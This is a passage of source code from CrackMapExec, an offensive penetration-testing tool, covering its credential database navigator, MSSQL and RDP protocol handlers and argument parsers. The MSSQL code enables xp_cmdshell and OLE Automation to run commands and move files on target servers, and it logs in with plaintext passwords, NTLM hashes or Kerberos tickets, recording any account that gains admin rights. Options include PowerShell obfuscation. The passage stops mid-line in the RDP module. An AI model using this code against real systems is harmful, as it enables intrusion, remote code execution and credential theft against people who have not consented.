host_id_list:\n links = self.db.get_admin_relations(host_id=host_id)\n\n for link in links:\n link_id, cred_id, host_id = link\n creds = self.db.get_credentials(filter_term=cred_id)\n\n for cred in creds:\n data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])\n print_table(data, title=\"Credential(s) with Admin Access\")\n\n def do_creds(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n creds = self.db.get_credentials()\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"add\":\n args = filter_term.split()[1:]\n\n if len(args) == 3:\n domain, username, password = args\n if validate_ntlm(password):\n self.db.add_credential(\"hash\", domain, username, password)\n else:\n self.db.add_credential(\"plaintext\", domain, username, password)\n else:\n print(\"[!] Format is 'add domain username password\")\n return\n elif filter_term.split()[0].lower() == \"remove\":\n args = filter_term.split()[1:]\n\n if len(args) != 1:\n print(\"[!] Format is 'remove '\")\n return\n else:\n self.db.remove_credentials(args)\n self.db.remove_links(credIDs=args)\n elif filter_term.split()[0].lower() == \"plaintext\":\n creds = self.db.get_credentials(cred_type=\"plaintext\")\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"hash\":\n creds = self.db.get_credentials(cred_type=\"hash\")\n self.display_creds(creds)\n else:\n creds = self.db.get_credentials(filter_term=filter_term)\n data = [[\"CredID\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n cred_id_list = []\n\n for cred in creds:\n cred_id_list.append(cred[0])\n data.append([cred[0], cred[1], cred[2], cred[3], cred[4]])\n\n print_table(data, title=\"Credential(s)\")\n\n data = [[\"HostID\", \"IP\", \"Hostname\", \"Domain\", \"OS\"]]\n for cred_id in cred_id_list:\n links = self.db.get_admin_relations(user_id=cred_id)\n\n for link in links:\n link_id, cred_id, host_id = link\n hosts = self.db.get_hosts(host_id)\n\n for host in hosts:\n data.append([host[0], host[1], host[2], host[3], host[4]])\n print_table(data, title=\"Admin Access to Host(s)\")\n\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n @staticmethod\n def help_clear_database():\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n\n def complete_hosts(self, text, line):\n \"\"\"\n Tab-complete 'creds' commands\n \"\"\"\n commands = (\"add\", \"remove\")\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n\n def complete_creds(self, text, line):\n \"\"\"\n Tab-complete 'creds' commands\n \"\"\"\n commands = (\"add\", \"remove\", \"hash\", \"plaintext\")\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n" }, { "path": "cme/protocols/mssql/mssqlexec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport binascii\nfrom cme.logger import cme_logger\n\n\nclass MSSQLEXEC:\n def __init__(self, connection):\n self.mssql_conn = connection\n self.outputBuffer = \"\"\n\n def execute(self, command, output=False):\n command_output = []\n try:\n self.enable_xp_cmdshell()\n except Exception as e:\n cme_logger.error(f\"Error when attempting to enable x_cmdshell: {e}\")\n try:\n result = self.mssql_conn.sql_query(f\"exec master..xp_cmdshell '{command}'\")\n cme_logger.debug(f\"SQL Query Result: {result}\")\n for row in result:\n if row[\"output\"] == \"NULL\":\n continue\n command_output.append(row[\"output\"])\n except Exception as e:\n cme_logger.error(f\"Error when attempting to execute command via xp_cmdshell: {e}\")\n\n if output:\n cme_logger.debug(f\"Output is enabled\")\n for row in command_output:\n cme_logger.debug(row)\n # self.mssql_conn.printReplies()\n # self.mssql_conn.colMeta[0][\"TypeData\"] = 80 * 2\n # self.mssql_conn.printRows()\n # self.outputBuffer = self.mssql_conn._MSSQL__rowsPrinter.getMessage()\n # if len(self.outputBuffer):\n # self.outputBuffer = self.outputBuffer.split('\\n', 2)[2]\n try:\n self.disable_xp_cmdshell()\n except Exception as e:\n cme_logger.error(f\"[OPSEC] Error when attempting to disable xp_cmdshell: {e}\")\n return command_output\n # return self.outputBuffer\n\n def enable_xp_cmdshell(self):\n self.mssql_conn.sql_query(\"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;\")\n\n def disable_xp_cmdshell(self):\n self.mssql_conn.sql_query(\"exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;\")\n\n def enable_ole(self):\n self.mssql_conn.sql_query(\"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;\")\n\n def disable_ole(self):\n self.mssql_conn.sql_query(\"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;\")\n\n def put_file(self, data, remote):\n try:\n self.enable_ole()\n hexdata = data.hex()\n self.mssql_conn.sql_query(\"DECLARE @ob INT;\" \"EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;\" \"EXEC sp_OASetProperty @ob, 'Type', 1;\" \"EXEC sp_OAMethod @ob, 'Open';\" \"EXEC sp_OAMethod @ob, 'Write', NULL, 0x{};\" \"EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '{}', 2;\" \"EXEC sp_OAMethod @ob, 'Close';\" \"EXEC sp_OADestroy @ob;\".format(hexdata, remote))\n self.disable_ole()\n except Exception as e:\n cme_logger.debug(f\"Error uploading via mssqlexec: {e}\")\n\n def file_exists(self, remote):\n try:\n res = self.mssql_conn.batch(f\"DECLARE @r INT; EXEC master.dbo.xp_fileexist '{remote}', @r OUTPUT; SELECT @r as n\")[0][\"n\"]\n return res == 1\n except:\n return False\n\n def get_file(self, remote, local):\n try:\n self.mssql_conn.sql_query(f\"SELECT * FROM OPENROWSET(BULK N'{remote}', SINGLE_BLOB) rs\")\n data = self.mssql_conn.rows[0][\"BulkColumn\"]\n\n with open(local, \"wb+\") as f:\n f.write(binascii.unhexlify(data))\n\n except Exception as e:\n cme_logger.debug(f\"Error downloading via mssqlexec: {e}\")\n" }, { "path": "cme/protocols/mssql/proto_args.py", "content": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n mssql_parser = parser.add_parser('mssql', help=\"own stuff using MSSQL\", parents=[std_parser, module_parser])\n mssql_parser.add_argument(\"-H\", '--hash', metavar=\"HASH\", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')\n mssql_parser.add_argument(\"--port\", default=1433, type=int, metavar='PORT', help='MSSQL port (default: 1433)')\n mssql_parser.add_argument(\"-q\", \"--query\", dest='mssql_query', metavar='QUERY', type=str, help='execute the specified query against the MSSQL DB')\n no_smb_arg = mssql_parser.add_argument(\"--no-smb\", action=get_conditional_action(_StoreTrueAction), make_required=[], help='No smb connection')\n\n dgroup = mssql_parser.add_mutually_exclusive_group()\n domain_arg = dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest='domain', type=str, help=\"domain name\")\n dgroup.add_argument(\"--local-auth\", action='store_true', help='authenticate locally to each target')\n no_smb_arg.make_required = [domain_arg]\n\n cgroup = mssql_parser.add_argument_group(\"Command Execution\", \"options for executing commands\")\n cgroup.add_argument('--force-ps32', action='store_true', help='force the PowerShell command to run in a 32-bit process')\n cgroup.add_argument('--no-output', action='store_true', help='do not retrieve command output')\n xgroup = cgroup.add_mutually_exclusive_group()\n xgroup.add_argument(\"-x\", metavar=\"COMMAND\", dest='execute', help=\"execute the specified command\")\n xgroup.add_argument(\"-X\", metavar=\"PS_COMMAND\", dest='ps_execute', help='execute the specified PowerShell command')\n\n psgroup = mssql_parser.add_argument_group('Powershell Obfuscation', \"Options for PowerShell script obfuscation\")\n psgroup.add_argument('--obfs', action='store_true', help='Obfuscate PowerShell scripts')\n psgroup.add_argument('--clear-obfscripts', action='store_true', help='Clear all cached obfuscated PowerShell scripts')\n\n tgroup = mssql_parser.add_argument_group(\"Files\", \"Options for put and get remote files\")\n tgroup.add_argument(\"--put-file\", nargs=2, metavar=\"FILE\", help='Put a local file into remote target, ex: whoami.txt C:\\\\Windows\\\\Temp\\\\whoami.txt')\n tgroup.add_argument(\"--get-file\", nargs=2, metavar=\"FILE\", help='Get a remote file, ex: C:\\\\Windows\\\\Temp\\\\whoami.txt whoami.txt')\n\n return parser\n\ndef get_conditional_action(baseAction):\n class ConditionalAction(baseAction):\n def __init__(self, option_strings, dest, **kwargs):\n x = kwargs.pop('make_required', [])\n super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)\n self.make_required = x\n\n def __call__(self, parser, namespace, values, option_string=None):\n for x in self.make_required:\n x.required = True\n super(ConditionalAction, self).__call__(parser, namespace, values, option_string)\n\n return ConditionalAction" }, { "path": "cme/protocols/mssql.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nimport os\nfrom io import StringIO\n\nfrom cme.config import process_secret\nfrom cme.protocols.mssql.mssqlexec import MSSQLEXEC\nfrom cme.connection import *\nfrom cme.helpers.logger import highlight\nfrom cme.helpers.bloodhound import add_user_bh\nfrom cme.helpers.powershell import create_ps_command\nfrom impacket import tds\nfrom impacket.krb5.ccache import CCache\nfrom impacket.smbconnection import SMBConnection, SessionError\nfrom impacket.tds import (\n SQLErrorException,\n TDS_LOGINACK_TOKEN,\n TDS_ERROR_TOKEN,\n TDS_ENVCHANGE_TOKEN,\n TDS_INFO_TOKEN,\n TDS_ENVCHANGE_VARCHAR,\n TDS_ENVCHANGE_DATABASE,\n TDS_ENVCHANGE_LANGUAGE,\n TDS_ENVCHANGE_CHARSET,\n TDS_ENVCHANGE_PACKETSIZE,\n)\n\n\nclass mssql(connection):\n def __init__(self, args, db, host):\n self.mssql_instances = None\n self.domain = None\n self.server_os = None\n self.hash = None\n self.os_arch = None\n self.nthash = \"\"\n\n connection.__init__(self, args, db, host)\n\n def proto_flow(self):\n self.proto_logger()\n if self.create_conn_obj():\n self.enum_host_info()\n self.print_host_info()\n if self.login():\n if hasattr(self.args, \"module\") and self.args.module:\n self.call_modules()\n else:\n self.call_cmd_args()\n\n def proto_logger(self):\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"MSSQL\",\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": \"None\",\n }\n )\n\n def enum_host_info(self):\n # this try pass breaks module http server, more info https://github.com/byt3bl33d3r/CrackMapExec/issues/363\n try:\n # Probably a better way of doing this, grab our IP from the socket\n self.local_ip = str(self.conn.socket).split()[2].split(\"=\")[1].split(\":\")[0]\n except:\n pass\n\n if self.args.no_smb:\n self.domain = self.args.domain\n else:\n try:\n smb_conn = SMBConnection(self.host, self.host, None)\n try:\n smb_conn.login(\"\", \"\")\n except SessionError as e:\n if \"STATUS_ACCESS_DENIED\" in e.getErrorString():\n pass\n\n self.domain = smb_conn.getServerDNSDomainName()\n self.hostname = smb_conn.getServerName()\n self.server_os = smb_conn.getServerOS()\n self.logger.extra[\"hostname\"] = self.hostname\n\n try:\n smb_conn.logoff()\n except:\n pass\n\n if self.args.domain:\n self.domain = self.args.domain\n\n if self.args.local_auth:\n self.domain = self.hostname\n except Exception as e:\n self.logger.fail(f\"Error retrieving host domain: {e} specify one manually with the '-d' flag\")\n\n self.mssql_instances = self.conn.getInstances(0)\n self.db.add_host(\n self.host,\n self.hostname,\n self.domain,\n self.server_os,\n len(self.mssql_instances),\n )\n\n try:\n self.conn.disconnect()\n except:\n pass\n\n def print_host_info(self):\n self.logger.display(f\"{self.server_os} (name:{self.hostname}) (domain:{self.domain})\")\n # if len(self.mssql_instances) > 0:\n # self.logger.display(\"MSSQL DB Instances: {}\".format(len(self.mssql_instances)))\n # for i, instance in enumerate(self.mssql_instances):\n # self.logger.debug(\"Instance {}\".format(i))\n # for key in instance.keys():\n # self.logger.debug(key + \":\" + instance[key])\n\n def create_conn_obj(self):\n try:\n self.conn = tds.MSSQL(self.host, self.args.port)\n self.conn.connect()\n except socket.error as e:\n self.logger.debug(f\"Error connecting to MSSQL: {e}\")\n return False\n return True\n\n def check_if_admin(self):\n try:\n results = self.conn.sql_query(\"SELECT IS_SRVROLEMEMBER('sysadmin')\")\n is_admin = int(results[0][\"\"])\n except Exception as e:\n self.logger.fail(f\"Error querying for sysadmin role: {e}\")\n return False\n\n if is_admin:\n self.admin_privs = True\n self.logger.debug(f\"User is admin\")\n else:\n return False\n return True\n\n def kerberos_login(\n self,\n domain,\n username,\n password=\"\",\n ntlm_hash=\"\",\n aesKey=\"\",\n kdcHost=\"\",\n useCache=False,\n ):\n try:\n self.conn.disconnect()\n except:\n pass\n self.create_conn_obj()\n\n nthash = \"\"\n hashes = None\n if ntlm_hash != \"\":\n if ntlm_hash.find(\":\") != -1:\n hashes = ntlm_hash\n nthash = ntlm_hash.split(\":\")[1]\n else:\n # only nt hash\n hashes = f\":{ntlm_hash}\"\n nthash = ntlm_hash\n\n if not all(\"\" == s for s in [self.nthash, password, aesKey]):\n kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)\n else:\n kerb_pass = \"\"\n try:\n res = self.conn.kerberosLogin(\n None,\n username,\n password,\n domain,\n hashes,\n aesKey,\n kdcHost=kdcHost,\n useCache=useCache,\n )\n if res is not True:\n self.conn.printReplies()\n return False\n\n self.password = password\n if username == \"\" and useCache:\n ccache = CCache.loadFile(os.getenv(\"KRB5CCNAME\"))\n principal = ccache.principal.toPrincipal()\n self.username = principal.components[0]\n username = principal.components[0]\n else:\n self.username = username\n self.domain = domain\n self.check_if_admin()\n\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n domain = f\"{domain}\\\\\" if not self.args.local_auth else \"\"\n\n self.logger.success(f\"{domain}{username}{used_ccache} {self.mark_pwned()}\")\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except Exception as e:\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n domain = f\"{domain}\\\\\" if not self.args.local_auth else \"\"\n self.logger.fail(f\"{domain}\\\\{username}{used_ccache} {e}\")\n return False\n\n def plaintext_login(self, domain, username, password):\n try:\n self.conn.disconnect()\n except:\n pass\n self.create_conn_obj()\n\n try:\n # this is to prevent a decoding issue in impacket/ntlm.py:617 where it attempts to decode the domain\n if not domain:\n domain = \"\"\n res = self.conn.login(None, username, password, domain, None, not self.args.local_auth)\n if res is not True:\n self.handle_mssql_reply()\n return False\n\n self.password = password\n self.username = username\n self.domain = domain\n self.check_if_admin()\n self.db.add_credential(\"plaintext\", domain, username, password)\n\n if self.admin_privs:\n self.db.add_admin_user(\"plaintext\", domain, username, password, self.host)\n\n domain = f\"{domain}\\\\\" if not self.args.local_auth else \"\"\n out = f\"{domain}{username}:{process_secret(password)} {self.mark_pwned()}\"\n self.logger.success(out)\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except BrokenPipeError as e:\n self.logger.fail(f\"Broken Pipe Error while attempting to login\")\n return False\n except Exception as e:\n self.logger.fail(f\"{domain}\\\\{username}:{process_secret(password)}\")\n self.logger.exception(e)\n return False\n\n def hash_login(self, domain, username, ntlm_hash):\n lmhash = \"\"\n nthash = \"\"\n\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n else:\n nthash = ntlm_hash\n\n try:\n self.conn.disconnect()\n except:\n pass\n self.create_conn_obj()\n\n try:\n res = self.conn.login(\n None,\n username,\n \"\",\n domain,\n \":\" + nthash if not lmhash else ntlm_hash,\n not self.args.local_auth,\n )\n if res is not True:\n self.conn.printReplies()\n return False\n\n self.hash = ntlm_hash\n self.username = username\n self.domain = domain\n self.check_if_admin()\n self.db.add_credential(\"hash\", domain, username, ntlm_hash)\n\n if self.admin_privs:\n self.db.add_admin_user(\"hash\", domain, username, ntlm_hash, self.host)\n\n out = f\"{domain}\\\\{username} {process_secret(ntlm_hash)} {self.mark_pwned()}\"\n self.logger.success(out)\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except BrokenPipeError as e:\n self.logger.fail(f\"Broken Pipe Error while attempting to login\")\n return False\n except Exception as e:\n self.logger.fail(f\"{domain}\\\\{username}:{process_secret(ntlm_hash)} {e}\")\n return False\n\n def mssql_query(self):\n if self.conn.lastError:\n # Invalid connection\n return None\n query = self.args.mssql_query\n self.logger.info(f\"Query to run:\\n{query}\")\n try:\n raw_output = self.conn.sql_query(query)\n self.logger.info(\"Executed MSSQL query\")\n self.logger.debug(f\"Raw output: {raw_output}\")\n for data in raw_output:\n if isinstance(data, dict):\n for key, value in data.items():\n if key:\n self.logger.highlight(f\"{key}:{value}\")\n else:\n self.logger.highlight(f\"{value}\")\n else:\n self.logger.fail(\"Unexpected output\")\n except Exception as e:\n self.logger.exception(e)\n return None\n\n return raw_output\n\n @requires_admin\n def execute(self, payload=None, print_output=False):\n if not payload and self.args.execute:\n payload = self.args.execute\n\n self.logger.info(f\"Command to execute:\\n{payload}\")\n try:\n exec_method = MSSQLEXEC(self.conn)\n raw_output = exec_method.execute(payload, print_output)\n self.logger.info(\"Executed command via mssqlexec\")\n self.logger.debug(f\"Raw output: {raw_output}\")\n except Exception as e:\n self.logger.exception(e)\n return None\n\n if hasattr(self, \"server\"):\n self.server.track_host(self.host)\n\n if self.args.execute or self.args.ps_execute:\n self.logger.success(\"Executed command via mssqlexec\")\n if self.args.no_output:\n self.logger.debug(f\"Output set to disabled\")\n else:\n for line in raw_output:\n self.logger.highlight(line)\n\n return raw_output\n\n @requires_admin\n def ps_execute(\n self,\n payload=None,\n get_output=False,\n methods=None,\n force_ps32=False,\n dont_obfs=True,\n ):\n if not payload and self.args.ps_execute:\n payload = self.args.ps_execute\n if not self.args.no_output:\n get_output = True\n\n # We're disabling PS obfuscation by default as it breaks the MSSQLEXEC execution method\n ps_command = create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs)\n return self.execute(ps_command, get_output)\n\n @requires_admin\n def put_file(self):\n self.logger.display(f\"Copy {self.args.put_file[0]} to {self.args.put_file[1]}\")\n with open(self.args.put_file[0], \"rb\") as f:\n try:\n data = f.read()\n self.logger.display(f\"Size is {len(data)} bytes\")\n exec_method = MSSQLEXEC(self.conn)\n exec_method.put_file(data, self.args.put_file[1])\n if exec_method.file_exists(self.args.put_file[1]):\n self.logger.success(\"File has been uploaded on the remote machine\")\n else:\n self.logger.fail(\"File does not exist on the remote system... error during upload\")\n except Exception as e:\n self.logger.fail(f\"Error during upload : {e}\")\n\n @requires_admin\n def get_file(self):\n remote_path = self.args.get_file[0]\n download_path = self.args.get_file[1]\n self.logger.display(f'Copying \"{remote_path}\" to \"{download_path}\"')\n \n try:\n exec_method = MSSQLEXEC(self.conn)\n exec_method.get_file(self.args.get_file[0], self.args.get_file[1])\n self.logger.success(f'File \"{remote_path}\" was downloaded to \"{download_path}\"')\n except Exception as e:\n self.logger.fail(f'Error reading file \"{remote_path}\": {e}')\n if os.path.getsize(download_path) == 0:\n os.remove(download_path)\n\n # We hook these functions in the tds library to use CME's logger instead of printing the output to stdout\n # The whole tds library in impacket needs a good overhaul to preserve my sanity\n def handle_mssql_reply(self):\n for keys in self.conn.replies.keys():\n for i, key in enumerate(self.conn.replies[keys]):\n if key[\"TokenType\"] == TDS_ERROR_TOKEN:\n error = f\"ERROR({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}\"\n self.conn.lastError = SQLErrorException(f\"ERROR: Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}\")\n self.logger.fail(error)\n elif key[\"TokenType\"] == TDS_INFO_TOKEN:\n self.logger.display(f\"INFO({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}\")\n elif key[\"TokenType\"] == TDS_LOGINACK_TOKEN:\n self.logger.display(f\"ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) \")\n elif key[\"TokenType\"] == TDS_ENVCHANGE_TOKEN:\n if key[\"Type\"] in (\n TDS_ENVCHANGE_DATABASE,\n TDS_ENVCHANGE_LANGUAGE,\n TDS_ENVCHANGE_CHARSET,\n TDS_ENVCHANGE_PACKETSIZE,\n ):\n record = TDS_ENVCHANGE_VARCHAR(key[\"Data\"])\n if record[\"OldValue\"] == \"\":\n record[\"OldValue\"] = \"None\".encode(\"utf-16le\")\n elif record[\"NewValue\"] == \"\":\n record[\"NewValue\"] = \"None\".encode(\"utf-16le\")\n if key[\"Type\"] == TDS_ENVCHANGE_DATABASE:\n _type = \"DATABASE\"\n elif key[\"Type\"] == TDS_ENVCHANGE_LANGUAGE:\n _type = \"LANGUAGE\"\n elif key[\"Type\"] == TDS_ENVCHANGE_CHARSET:\n _type = \"CHARSET\"\n elif key[\"Type\"] == TDS_ENVCHANGE_PACKETSIZE:\n _type = \"PACKETSIZE\"\n else:\n _type = f\"{key['Type']:d}\"\n self.logger.display(f\"ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')}\")\n" }, { "path": "cme/protocols/rdp/__init__.py", "content": "" }, { "path": "cme/protocols/rdp/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\n\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy import MetaData, Table\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom cme.logger import cme_logger\n\n\nclass database:\n def __init__(self, db_engine):\n self.CredentialsTable = None\n self.HostsTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n # this is still named \"conn\" when it is the session object; TODO: rename\n self.conn = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\n \"\"\"CREATE TABLE \"credentials\" (\n \"id\" integer PRIMARY KEY,\n \"username\" text,\n \"password\" text,\n \"pkey\" text\n )\"\"\"\n )\n\n db_conn.execute(\n \"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"ip\" text,\n \"hostname\" text,\n \"port\" integer,\n \"server_banner\" text\n )\"\"\"\n )\n\n def reflect_tables(self):\n with self.db_engine.connect() as conn:\n try:\n self.CredentialsTable = Table(\"credentials\", self.metadata, autoload_with=self.db_engine)\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.conn.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.conn.execute(table.delete())\n" }, { "path": "cme/protocols/rdp/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(DatabaseNavigator):\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n" }, { "path": "cme/protocols/rdp/proto_args.py", "content": "def proto_args(parser, std_parser, module_parser):\n rdp_parser = parser.add_parser('rdp', help=\"own stuff using RDP\", parents=[std_parser, module_parser])\n rdp_parser.add_argument(\"-H\", '--hash', metavar=\"HASH\", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')\n rdp_parser.add_argument(\"--port\", type=int, default=3389, help=\"Custom RDP port\")\n rdp_parser.add_argument(\"--rdp-timeout\", type=int, default=5, help=\"RDP timeout on socket connection, defalut is %(default)ss\")\n rdp_parser.add_argument(\"--nla-screenshot\", action=\"store_true\", help=\"Screenshot RDP login prompt if NLA is disabled\")\n\n dgroup = rdp_parser.add_mutually_exclusive_group()\n dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest='domain', type=str, default=None, help=\"domain to authenticate to\")\n dgroup.add_argument(\"--local-auth\", action='store_true', help='authenticate locally to each target')\n\n egroup = rdp_parser.add_argument_group(\"Screenshot\", \"Remote Desktop Screenshot\")\n egroup.add_argument(\"--screenshot\", action=\"store_true\", help=\"Screenshot RDP if connection success\")\n egroup.add_argument('--screentime', type=int, default=10, help='Time to wait for desktop image, default is %(default)ss')\n egroup.add_argument('--res', default='1024x768', help='Resolution in \"WIDTHxHEIGHT\" format. Default: \"1024x768\"')\n\n return parser" }, { "path": "cme/protocols/rdp.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nfrom datetime import datetime\nfrom os import getenv\nfrom termcolor import colored\n\nfrom impacket.krb5.ccache import CCache\n\nfrom cme.connection import *\nfrom cme.helpers.bloodhound import add_user_bh\nfrom cme.logger import CMEAdapter\nfrom cme.config import host_info_colors\nfrom cme.config import process_secret\n\nfrom aardwolf.connection import RDPConnection\nfrom aardwolf.commons.queuedata.constants import VIDEO_FORMAT\nfrom aardwolf.commons.iosettings import RDPIOSettings\nfrom aardwolf.commons.target import RDPTarget\nfrom aardwolf.protocol.x224.constants import SUPP_PROTOCOLS\nfrom asyauth.common.credentials.ntlm import NTLMCredential\nfrom asyauth.common.credentials.kerberos import KerberosCredential\nfrom asyauth.common.constants import asyauthSecret\nfrom asysocks.unicomm.common.target import UniTarget, UniProto\n\nclass rdp(connection):\n def __init__(self, args, db, host):\n self.domain = None\n self.server_os = None\n self.iosettings = RDPIOSettings()\n self.iosettings.channels = []\n self.iosettings.video_out_format = VIDEO_FORMAT.RAW\n self.iosettings.clipboard_use_pyperclip = False\n self.protoflags_nla = [\n SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.RDP,\n SUPP_PROTOCOLS.SSL,\n SUPP_PROTOCOLS.RDP,\n ]\n self.protoflags = [\n SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.RDP,\n SUPP_PROTOCOLS.SSL,\n SUPP_PROTOCOLS.RDP,\n SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.HYBRID,\n SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.HYBRID_EX,\n ]\n width, height = args.res.upper().split(\"X\")\n height = int(height)\n width = int(width)\n self.iosettings.video_width = width\n self.iosettings.video_height = height\n # servers dont support 8 any more :/\n self.iosettings.video_bpp_min = 15\n self.iosettings.video_bpp_max = 32\n # PIL produces incorrect picture for some reason?! TODO: check bug\n self.iosettings.video_out_format = VIDEO_FORMAT.PNG #\n self.output_filename = None\n self.domain = None\n self.server_os = None\n self.url = None\n self.nla = True\n self.hybrid = False\n self.target = None\n self.auth = None\n\n self.rdp_error_status = {\n \"0xc0000071\": \"STATUS_PASSWORD_EXPIRED\",\n \"0xc0000234\": \"STATUS_ACCOUNT_LOCKED_OUT\",\n \"0xc0000072\": \"STATUS_ACCOUNT_DISABLED\",\n \"0xc0000193\": \"STATUS_ACCOUNT_EXPIRED\",\n \"0xc000006E\": \"STATUS_ACCOUNT_RESTRICTION\",\n \"0xc000006F\": \"STATUS_INVALID_LOGON_HOURS\",\n \"0xc0000070\": \"STATUS_INVALID_WORKSTATION\",\n \"0xc000015B\": \"STATUS_LOGON_TYPE_NOT_GRANTED\",\n \"0xc0000224\": \"STATUS_PASSWORD_MUST_CHANGE\",\n \"0xc0000022\": \"STATUS_ACCESS_DENIED\",\n \"0xc000006d\": \"STATUS_LOGON_FAILURE\",\n \"0xc000006a\": \"STATUS_WRONG_PASSWORD \",\n \"KDC_ERR_CLIENT_REVOKED\": \"KDC_ERR_CLIENT_REVOKED\",\n \"KDC_ERR_PREAUTH_FAILED\": \"KDC_ERR_PREAUTH_FAILED\",\n }\n\n connection.__init__(self, args, db, host)\n\n # def proto_flow(self):\n # if self.create_conn_obj():\n # self.proto_logger()\n # self.print_host_info()\n # if self.login() or (self.username == '' and self.password == ''):\n # if hasattr(self.args, 'module') and self.args.module:\n # self.call_modules()\n # else:\n # self.call_cmd_args()\n\n def proto_logger(self):\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"RDP\",\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": self.hostname,\n }\n )\n\n def print_host_info(self):\n nla = colored(f\"nla:{self.nla}\", host_info_colors[3], attrs=['bold']) if self.nla else colored(f\"nla:{self.nla}\", host_info_colors[2], attrs=['bold'])\n if self.domain is None:\n self.logger.display(\"Probably old, doesn't not support HYBRID or HYBRID_EX\" f\" 